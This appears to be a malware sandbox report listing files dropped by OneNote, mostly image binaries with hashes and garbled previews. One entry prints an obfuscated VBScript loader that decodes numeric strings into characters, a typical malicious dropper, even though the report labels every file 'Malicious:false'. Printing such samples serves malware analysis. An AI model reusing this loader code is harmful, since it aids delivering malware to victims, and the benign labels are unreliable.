                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{E96E73CF-AA52-4E46-8213-9FEC22567AB5}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{EBE5A086-6115-4CBB-A2E6-E489E763360E}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 40 x 650, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):647
                                                                                                                                                                                                                  Entropy (8bit):6.854433034679255
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:12:6v/71rwqZMXVs99W1YvpLp/Fvl+f43ocLtuplb+CrGotLRd:+wqWXVs99rpLpNvr3pIx3b
                                                                                                                                                                                                                  MD5:DD876AA103BEC3AC83C769D768AD39FB
                                                                                                                                                                                                                  SHA1:1833603AA9B6A7E53F9AD8A336F96CCE33088234
                                                                                                                                                                                                                  SHA-256:1262DD23AD54E935CFA10FEB1BE56648E43BEF1116696CA71D87E6E033B1CA7D
                                                                                                                                                                                                                  SHA-512:946DB2277213104A3B29EC4388578B05027B974A3093B4CCAD8847397AA51AE308BC6A199E5705E1F901D6E4B1BA34D8DECFD6E5B6685184A307D749D7CFAEDD
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...(.........xk....`PLTE.........................................................................................>.S.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.)..1..7w....6.*.H`T6.ha.k.............b!....Ba..C..P.4K..@.....h.E..X....PX+.P.-.....@@"...o.O4....xZ<...B...B..,A..y.s<......b!....Ba..C..0_p. .......=..,...i. ...=.j..N...........{4+...xZ<...B....|.....$.K<.vyE..X....PX+.P.-.:... .'p......\,...i. ...=.j........K.....%J..S+.....q..k.H.@DD.s...:..J.K.DDL.\.@`,.DD.:.(]..N....KD....A M.....F..S+.....1.sq........\.t..;..../...~k...4.DD.:..]..N....KD........@DD.s...:..J.K..[...Q....V......IEND.B`.

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{EC37955A-E6D0-4983-8C5D-E9F8C1388A87}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{ED0FC3EE-23CE-4215-9612-5200B0740E9E}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14553
                                                                                                                                                                                                                  Entropy (8bit):7.951135681293377
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:EF7aDrPYJ1n3kaEf61xD+KvdokCixTQm7QA96dNT:EF7a/PMeaEf61lT6kCiFQCQq6zT
                                                                                                                                                                                                                  MD5:3E9F7D399DF9CAD3669B7A5445EF7074
                                                                                                                                                                                                                  SHA1:2FBC965DC03EF9203581F595E0D7AB1734726ED7
                                                                                                                                                                                                                  SHA-256:76C80E31F37248C3C787F7972A7B22038390F9D81E72E650071A6F36D36AF27A
                                                                                                                                                                                                                  SHA-512:326F8F9CBF829BF80AAA96062A57255A36EE04DE310634327AA075D14129CFA8E36E48AB2A00B10F9BDC1D94F1AC7A9E41D0D063361920A0332EC124BDF4C3EE
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..8nIDATx^..xT...!=!$..%t..H.tP:.HQP@E,...QQ.^.....* E.(" ]:.K..R......p..n.9{...sv.}.....7.....o..z...,|.......M +.....w........O...>.SJ.O...<...{. .x..g..I..H.......V .. .}.PO..H+$@.$@=.=@.$@.......VH..H.z.{..H...!@=.#...............C.z..GZ!.. ..)... .....T...B.$@..S..$@.$....>.i..H......H..H@...S}8......POy......>....p... ...... .. .}.PO..H+$@.$@=.=@.$@.......VH..H..zz?.......$@.$`i......c;.n..i...0..........<......S....w..c.....y..F4.p..3~..|.]....s.6[..H...N@.=M..|`...3./...I.....'..|..K...r|...nX...'.. .G...ib|...MY8|......9x..Ur'.. ._ .....5..H..d..L.$@..I..o.;kM.$.?........K/.wn......Y....E..%K*.=.......Y.3.!k....[V..WG/?i..H..." T.,z...6h.[..-%9....WMY...z.vH..H@/.BOe....g-P.@.......lH.O...SJ}5.|....?.^..5^}..$.. .....S.@...*<.gJT/......_.R.C.....rj..Cg'\K........K....~Y....l@..)..l.k.s..Yr.....Z]jG..q.+..G...;lNJj.}..T1&&.. .....?...|....W<{...g.&'Ca

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{EEB37972-ABBB-45F7-81E1-5BAB6389EADA}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{F0BDE405-78A9-48C1-A983-CC14AC7AA4A3}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):17289
                                                                                                                                                                                                                  Entropy (8bit):7.962998633267186
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                                  MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                                  SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                                  SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                                  SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..C.IDATx^...Uc.._"oB.Hr.m(.0......r..[1.D....R..q)%FBDiB.."w*.k.Jz.Y..l....>...9{.......g..Y.z~..k?.z.^k..+V...! ....(.....\sM.tD@...!P...HW.S....u^.....@.r.^.....B@...U.H.J....... }....".....>....! ..A@.4..EE...! }*...B@....i<8.....B@.T2 .........xp..! .....d@...!......(*B@....S....B ...O..QT........! ..@<.H......! ..O%.B@...x..9...C'|..{.>Z../~^.s<<V4..ujo..v.Z7..EwT.....@.....?.......~{...K.........C........bB@.$.....C.{....Kf'S.....T.*&....@<.....'..D`...;~v.DT]...r!..>....ru...}.....#uG.T.....>..z ...3v....P.M.....5.@<...?....F.}..c.W[.._!P...O..>.M.d<..J....E .}ZZ.+.5v.p>..N.{B....>M.Nzfb...OB@.." }.D.y...IdK<..! }.:.....f.K..bX.T9...&T.&?.VB9.[B@..@@.4..1}.4.@H..-!..}..~M.<.z..I}.G....>..S...N..@yj..n..s.d._.....(..R"....Wf\.oO.^...\h.\.`)...ni.'.].vk.1-.k.^....#.,}.{.RM...~Z.S.. .@U!.&}......h...{K..@.........W.8.N.s.Y.0)..f+...%4.......5.@j.):k.+3...I..(

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{F1FB6101-53C9-4C80-A72F-8BEF2698CD17}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:HTML document, ASCII text, with very long lines (792), with CRLF line terminators
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):55113
                                                                                                                                                                                                                  Entropy (8bit):5.216959514455489
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:n9Te2jdcdTeNtu1t/nl8BFWVyeaNhvsbsS:9TVdaeNtuXndH
                                                                                                                                                                                                                  MD5:AE25F2104967B2708AC9DBA80AAC52FD
                                                                                                                                                                                                                  SHA1:7AC0150B43CBB5EEBA9A0F956E1291DF6790F3BF
                                                                                                                                                                                                                  SHA-256:11B3D1564B12934489281250C9A683F076FE10254BFDD7DA72307E538838EC56
                                                                                                                                                                                                                  SHA-512:D4A7F95631E7EB88FDADBE66D31BF9C7459D0F80CA2C9174952AAD42BFF6262241B25916E6A089F778990BE981A2CF220BAA69AD261314247C286397553DECCA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:<job id="cucuparu">..<script language="VBScript">..fastenedy = fastenedy + ("\ocw40599\ocw39558\ocw37476\ocw34353\ocw38517\ocw40599\ocw38170\ocw40252\ocw21167\ocw17003\ocw4511")..megamouthy = "megamouthy"..girlohy = girlohy + ("sycrwf\ocwfalsetreatedyextenuatingywhomytreatedy")..mendy = "mendy"..waryfishy = mid(girlohy,7,4)..'tegerytegery..elementumy = Split(fastenedy,waryfishy,-1,0)..wonderingy = "wonderingy"..for prepossessedy = 1 to Ubound(elementumy)...jestinglyy = jestinglyy & chr(Clng(elementumy(prepossessedy)) / 347)..Next..'wonderingywonderingy..fastenedy = fastenedy + ("\ocw39905\ocw35047\ocw40252\ocw11104\ocw35394\ocw39905\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw21167\ocw34353\ocw39558\ocw35047\ocw33659\ocw40252\ocw35047\ocw38517\ocw34006\ocw36782\ocw35047\ocw34353\ocw40252\ocw13880\ocw11798\ocw39905\ocw34353\ocw39558\ocw36435\ocw38864\ocw40252\ocw36435\ocw38170\ocw35741\ocw15962\ocw35394\ocw36435\ocw37476\ocw35047\ocw39905\ocw41987\ocw39905\ocw40252\ocw35047

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{F421A4C0-6278-4F69-B310-DF79FE0947B9}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):47294
                                                                                                                                                                                                                  Entropy (8bit):7.497888607667405
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:768:aQ10VrIBdBvDpQrQ7P9/FUOLG2vTSeG9lkCsMKzXeMBk3CBp:aC0JIBL+QsOLG2+ZAC1KqM2I
                                                                                                                                                                                                                  MD5:7A450E086AD14BA7D89BA5DB3D3AE6C7
                                                                                                                                                                                                                  SHA1:E7AEAFCFCE476390E18C19456BDF6529D863D518
                                                                                                                                                                                                                  SHA-256:BDD997068701ED3A00A224EB694B003C01AC69B857FE7B4147D6C34875B1632B
                                                                                                                                                                                                                  SHA-512:9B6D50A6CDB6081DA107A2CDDB1BD2811A5764994C8E3F67D56CA81084BE0D068C27435154E867199F38688EA65E8DE02A56DCAC47D0F5E55F0FBB6598814938
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.............................................................................................!1..A..Qa"..q..2.......B#...R%.r...$&b...3Ss.4dU6F.cE..'GC..t..5eufW......................!.1..AQ.aq..".....2BR......r.#3.d...b..Ccs.t......$4T...SD%5Ue&Vf............?..M.7(..).:.a.q.......>..[:O...afQ.uCO..U.....go.l..p..YqVklQ.{i.w&.]Z.\+JQw._.n.'.h..,.bj..X.].k&.Q.>gU..f...1|....[...jQ.%Zb.......t..........*..V..j.6....Vj..i.....?...IY.P.....$.j........[l.....S.4.J9.U\.......7I..[..=*N5....xW..../...=?n....uG.D..S.>...8..3........n.S....]k.*...4.>.R.o..{..l.H.#.^....<amG.m&.......,....wDY.W.m.X....We.IR.Nu...y..Z.l.._S.mr.m...y.]m.R.MT...6.5.5}.K..#%..k].7.Y.q]...%.r.7.R^jR..z.K.T[t.a..d.)glW.r.v,.`....O..^..o:.Uc.\..D....f..D......yt.Q...Y.....

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{F437F60C-481E-49F4-AABF-3C95DEF9EBAC}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):2332
                                                                                                                                                                                                                  Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                                  MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                                  SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                                  SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                                  SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......L.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.\.LUe......Ji("....9....-.."..5L.Y.Y.....$350.."2.lK3Cg...T..DWZ.......i.?!<..~x..z.......w.sw......9....s...w..l6.:....p"dH...F..B<...qE,R$G\!..E..".).#...."..{f.PyI.d..l;....;.=.S...O.S[.\Y^P.aj]9*Y!. ..~..#...S.s...l..h.[m....%...P..@.kG......G..X.r|%..AO.}-..G>35..c....Ac.&[W.d..+...zG........=..l...VS.d..+...tGd..k-._.....oL.:}.p.~.W$C..|...I...n...~......,.i......e..=..?{......>r~.Lw.+2..\w.)w~...c....h..u..%...PE...f..'..m.ZE.1.\....U.`X......$...P%..UH{[K..o7~.k.49..W.t.~.^_..7.,....f."q....+....;...~;.c.......Xb.\?...........0h.lV..WX!.....ljm.1c..U...[..X.)......B=.0~..W...rO..j...ehI5U:..66V5sJ.....V...]Y>...1kQH..2.........d....S....I...+..].p.....m7...Z....s.D>.K/]..?.l....2..=..~.mq..".+.....,..8. v.o.).Z......>..Xv..i...TA....M.....>[X...Y.7lJ..e7..S.....02q.O&9.......:L....N.......W....d..FqE..T..N.....R....kXv[..j......g.K.\@`.M..B}8n

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{F5070293-F6FB-4F71-BFA7-8432332F6B3B}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 230 x 68, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):4181
                                                                                                                                                                                                                  Entropy (8bit):7.950380155401321
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:L6ousL3eslFAmjb89xK6YiSTwtw5dTA1W9lQ:GoFiUFAMbsxJYieZ5dGklQ
                                                                                                                                                                                                                  MD5:BC6C08F8C2C6D1EEE95ABFC40C3C3669
                                                                                                                                                                                                                  SHA1:44DE7375375880ACC24938D7E92A837E85C35321
                                                                                                                                                                                                                  SHA-256:6E54B502C46E1AFA57E28B8ACCCE24F102399F31407827A91E4CD7A42FCBC746
                                                                                                                                                                                                                  SHA-512:2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.*B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_.*..c..n.......?....wa..l...p....E.Ly.}...*...C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...|....*\..O.*....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..*k.Y....z.;?..^...3.4|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{F56961F8-80D5-423A-85D2-B6481991AC04}.bin

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):13241
                                                                                                                                                                                                                  Entropy (8bit):7.931391290415517
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                                  MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                                  SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                                  SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                                  SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d..3NIDATx^...U...Y.]:.T...G.5..lX...B..Xb4F,I0X.....F...("vET4H......*EX........wo9..9.|...rw..;...;o......z.....B.......v.mn..>......E."....U...4s! ..F...u?.@...! .~F@... ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A.......~.*.U{.].....S.e...K.A.......7^?....D...h;...!.Eu...o.^..B@..# J...B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k..R].R...! .D...B@..........:..B@..R........! Ju.Ju$......j...! .\C@.....H...! J....B@....(.5(....B@..= ....p..Q.kP.#! ...(U{@...!....T.TGB@...Q......B.5.D..A........T..! ...k.D.RK.K.m.V.......(.^^^ZV^Z.7.a..........T..xsqYi....L......z....}....?..yyy.M\.b..U3W.0{...~.`}..M%.J*.w.mdv.&*..@....R..o/.^..5...x.g.>..ag....GM|t....\<s..y+6.X.? ,.R...-.W.m\..o..0g..i...h..W.Z.i...2.....o.&..@...-.B|.K..^.....u.}.M..6...,(...e.V.X........nkE....5.8....-.!.TtRxs....Q..2}.-..`....mX6i.w...

                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{F5921D9D-9D3E-4D72-868E-56676034C148}

                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
